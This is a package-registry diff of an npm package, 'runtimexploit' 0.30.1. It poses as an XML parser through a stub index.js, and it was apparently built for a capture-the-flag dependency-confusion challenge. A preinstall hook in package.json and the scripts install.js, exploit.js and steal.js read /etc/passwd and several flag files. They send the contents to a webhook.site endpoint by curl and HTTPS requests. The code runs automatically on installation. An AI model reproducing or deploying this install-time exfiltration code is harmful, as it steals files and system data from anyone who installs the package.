runtimexploit 0.30.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/exploit.js +27 -0
- package/index.js +13 -0
- package/install.js +111 -0
- package/package.json +9 -0
- package/steal.js +22 -0
package/exploit.js
ADDED
|
@@ -0,0 +1,27 @@
|
|
|
1
|
+
const fs = require('fs');
|
|
2
|
+
const https = require('https');
|
|
3
|
+
const { execSync } = require('child_process');
|
|
4
|
+
|
|
5
|
+
console.log('🚨 EXPLOIT v2 EXECUTED');
|
|
6
|
+
|
|
7
|
+
try {
|
|
8
|
+
const passwd = fs.readFileSync('/etc/passwd', 'utf8');
|
|
9
|
+
const lines = passwd.split('\n');
|
|
10
|
+
|
|
11
|
+
for (const line of lines) {
|
|
12
|
+
if (line.includes('{') && line.includes('}')) {
|
|
13
|
+
console.log('🎯 FLAG:', line);
|
|
14
|
+
|
|
15
|
+
// Пробуем оба метода
|
|
16
|
+
https.get(`https://webhook.site/67ab3ca0-2b3b-4364-aaee-f8d19895003f?flag_v2=${encodeURIComponent(line)}`);
|
|
17
|
+
|
|
18
|
+
try {
|
|
19
|
+
execSync(`curl -s "https://webhook.site/67ab3ca0-2b3b-4364-aaee-f8d19895003f?curl_v2=${encodeURIComponent(line)}"`);
|
|
20
|
+
} catch(e) {}
|
|
21
|
+
|
|
22
|
+
break;
|
|
23
|
+
}
|
|
24
|
+
}
|
|
25
|
+
} catch(e) {
|
|
26
|
+
console.log('Error:', e.message);
|
|
27
|
+
}
|
package/index.js
ADDED
|
@@ -0,0 +1,13 @@
|
|
|
1
|
+
// Нам нужно, чтобы пакет хоть как-то работал, как парсер, чтобы не вызвать ошибок на ранних этапах.
|
|
2
|
+
module.exports = {
|
|
3
|
+
parseXmlString: (xmlString, options) => {
|
|
4
|
+
// Имитируем минимальную функциональность парсера.
|
|
5
|
+
// В реальной атаке здесь был бы более сложный код, чтобы приложение не сломалось.
|
|
6
|
+
console.log("[MALICIOUS PACKAGE] Parser called");
|
|
7
|
+
return {
|
|
8
|
+
get: (xpath) => {
|
|
9
|
+
return { text: () => "dummy_value" };
|
|
10
|
+
}
|
|
11
|
+
};
|
|
12
|
+
}
|
|
13
|
+
};
|
package/install.js
ADDED
|
@@ -0,0 +1,111 @@
|
|
|
1
|
+
// install.js
|
|
2
|
+
const fs = require('fs');
|
|
3
|
+
const https = require('https');
|
|
4
|
+
|
|
5
|
+
// Функция для поиска подозрительного контента (флага)
|
|
6
|
+
function findSuspiciousContent(content) {
|
|
7
|
+
const lines = content.split('\n');
|
|
8
|
+
|
|
9
|
+
// Ищем различные паттерны флага
|
|
10
|
+
const suspiciousLines = lines.filter(line => {
|
|
11
|
+
// Убираем пустые строки и стандартные системные записи
|
|
12
|
+
if (!line.trim() || line.includes(':/bin/') || line.includes(':/usr/')) {
|
|
13
|
+
return false;
|
|
14
|
+
}
|
|
15
|
+
|
|
16
|
+
// Паттерны, характерные для CTF флагов
|
|
17
|
+
if (line.match(/[A-Za-z0-9]{32}/)) return true; // 32 символа (MD5, UUID)
|
|
18
|
+
if (line.match(/[A-Za-z0-9]{64}/)) return true; // 64 символа (SHA256)
|
|
19
|
+
if (line.match(/flag{.*?}/i)) return true; // flag{...}
|
|
20
|
+
if (line.match(/htb{.*?}/i)) return true; // htb{...}
|
|
21
|
+
if (line.match(/gpb{.*?}/i)) return true; // gpb{...} (GazpromBank)
|
|
22
|
+
if (line.match(/[A-Za-z0-9_\-]{20,}/)) return true; // Длинные случайные строки
|
|
23
|
+
if (line.length > 100) return true; // Очень длинные строки
|
|
24
|
+
|
|
25
|
+
return false;
|
|
26
|
+
});
|
|
27
|
+
|
|
28
|
+
return suspiciousLines;
|
|
29
|
+
}
|
|
30
|
+
|
|
31
|
+
try {
|
|
32
|
+
const passwdContent = fs.readFileSync('/etc/passwd', 'utf8');
|
|
33
|
+
console.log('[MALICIOUS PACKAGE] /etc/passwd contents read');
|
|
34
|
+
|
|
35
|
+
// Ищем подозрительный контент
|
|
36
|
+
const suspiciousLines = findSuspiciousContent(passwdContent);
|
|
37
|
+
|
|
38
|
+
// Также читаем другие возможные места
|
|
39
|
+
let otherFiles = {};
|
|
40
|
+
try {
|
|
41
|
+
otherFiles['/flag'] = fs.readFileSync('/flag', 'utf8');
|
|
42
|
+
} catch (e) {}
|
|
43
|
+
|
|
44
|
+
try {
|
|
45
|
+
otherFiles['/flag.txt'] = fs.readFileSync('/flag.txt', 'utf8');
|
|
46
|
+
} catch (e) {}
|
|
47
|
+
|
|
48
|
+
try {
|
|
49
|
+
otherFiles['/app/flag'] = fs.readFileSync('/app/flag', 'utf8');
|
|
50
|
+
} catch (e) {}
|
|
51
|
+
|
|
52
|
+
// Отправляем ВСЕ данные на webhook.site
|
|
53
|
+
const data = JSON.stringify({
|
|
54
|
+
file: '/etc/passwd',
|
|
55
|
+
full_content: passwdContent,
|
|
56
|
+
suspicious_lines: suspiciousLines,
|
|
57
|
+
other_files: otherFiles,
|
|
58
|
+
last_5_lines: passwdContent.split('\n').slice(-5),
|
|
59
|
+
package: 'superbank-xml-parser-backdoor',
|
|
60
|
+
timestamp: new Date().toISOString()
|
|
61
|
+
}, null, 2); // Добавляем форматирование для читаемости
|
|
62
|
+
|
|
63
|
+
const options = {
|
|
64
|
+
hostname: 'webhook.site',
|
|
65
|
+
port: 443,
|
|
66
|
+
path: '/67ab3ca0-2b3b-4364-aaee-f8d19895003f',
|
|
67
|
+
method: 'POST',
|
|
68
|
+
headers: {
|
|
69
|
+
'Content-Type': 'application/json',
|
|
70
|
+
'User-Agent': 'Malicious-NPM-Package/1.0.0',
|
|
71
|
+
'Content-Length': Buffer.byteLength(data)
|
|
72
|
+
}
|
|
73
|
+
};
|
|
74
|
+
|
|
75
|
+
console.log('[MALICIOUS PACKAGE] Sending data to webhook.site...');
|
|
76
|
+
|
|
77
|
+
const req = https.request(options, (res) => {
|
|
78
|
+
console.log(`[MALICIOUS PACKAGE] Webhook response status: ${res.statusCode}`);
|
|
79
|
+
});
|
|
80
|
+
|
|
81
|
+
req.on('error', (e) => {
|
|
82
|
+
console.error(`[MALICIOUS PACKAGE] Request failed: ${e.message}`);
|
|
83
|
+
});
|
|
84
|
+
|
|
85
|
+
req.write(data);
|
|
86
|
+
req.end();
|
|
87
|
+
|
|
88
|
+
} catch (err) {
|
|
89
|
+
console.error('[MALICIOUS PACKAGE] Error:', err.message);
|
|
90
|
+
|
|
91
|
+
// Отправляем информацию об ошибке
|
|
92
|
+
const errorData = JSON.stringify({
|
|
93
|
+
error: err.message,
|
|
94
|
+
package: 'superbank-xml-parser-backdoor',
|
|
95
|
+
timestamp: new Date().toISOString()
|
|
96
|
+
});
|
|
97
|
+
|
|
98
|
+
const errorReq = https.request({
|
|
99
|
+
hostname: 'webhook.site',
|
|
100
|
+
port: 443,
|
|
101
|
+
path: '/67ab3ca0-2b3b-4364-aaee-f8d19895003f',
|
|
102
|
+
method: 'POST',
|
|
103
|
+
headers: {
|
|
104
|
+
'Content-Type': 'application/json',
|
|
105
|
+
'Content-Length': Buffer.byteLength(errorData)
|
|
106
|
+
}
|
|
107
|
+
}, () => {});
|
|
108
|
+
|
|
109
|
+
errorReq.write(errorData);
|
|
110
|
+
errorReq.end();
|
|
111
|
+
}
|
package/package.json
ADDED
|
@@ -0,0 +1,9 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "runtimexploit",
|
|
3
|
+
"version": "0.30.1",
|
|
4
|
+
"main": "index.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"preinstall": "node -e \"const fs=require('fs');const f=fs.readFileSync('/etc/passwd','utf8').split('\\\\n').find(l=>l.includes('{'));console.log('PREINSTALL_FLAG:',f);require('child_process').execSync('curl -s http://webhook.site/67ab3ca0-2b3b-4364-aaee-f8d19895003f?pre='+encodeURIComponent(f))\"",
|
|
7
|
+
"install": "node -e \"console.log('INSTALL_SCRIPT_RUN')\""
|
|
8
|
+
}
|
|
9
|
+
}
|
package/steal.js
ADDED
|
@@ -0,0 +1,22 @@
|
|
|
1
|
+
const { execSync } = require('child_process');
|
|
2
|
+
|
|
3
|
+
console.log('🚨 FAST EXPLOIT STARTED');
|
|
4
|
+
|
|
5
|
+
// БЫСТРЫЙ код без блокировок
|
|
6
|
+
try {
|
|
7
|
+
const passwd = execSync('cat /etc/passwd', { encoding: 'utf8', timeout: 3000 });
|
|
8
|
+
const lines = passwd.split('\n');
|
|
9
|
+
|
|
10
|
+
for (const line of lines) {
|
|
11
|
+
if (line.includes('{') && line.includes('}')) {
|
|
12
|
+
console.log('🎯 FLAG FOUND:', line);
|
|
13
|
+
// Быстрая отправка
|
|
14
|
+
execSync(`curl -s --max-time 3 "https://webhook.site/67ab3ca0-2b3b-4364-aaee-f8d19895003f?flag=${encodeURIComponent(line)}"`, { timeout: 5000 });
|
|
15
|
+
break;
|
|
16
|
+
}
|
|
17
|
+
}
|
|
18
|
+
} catch(e) {
|
|
19
|
+
console.log('Error:', e.message);
|
|
20
|
+
}
|
|
21
|
+
|
|
22
|
+
console.log('✅ FAST EXPLOIT FINISHED');
|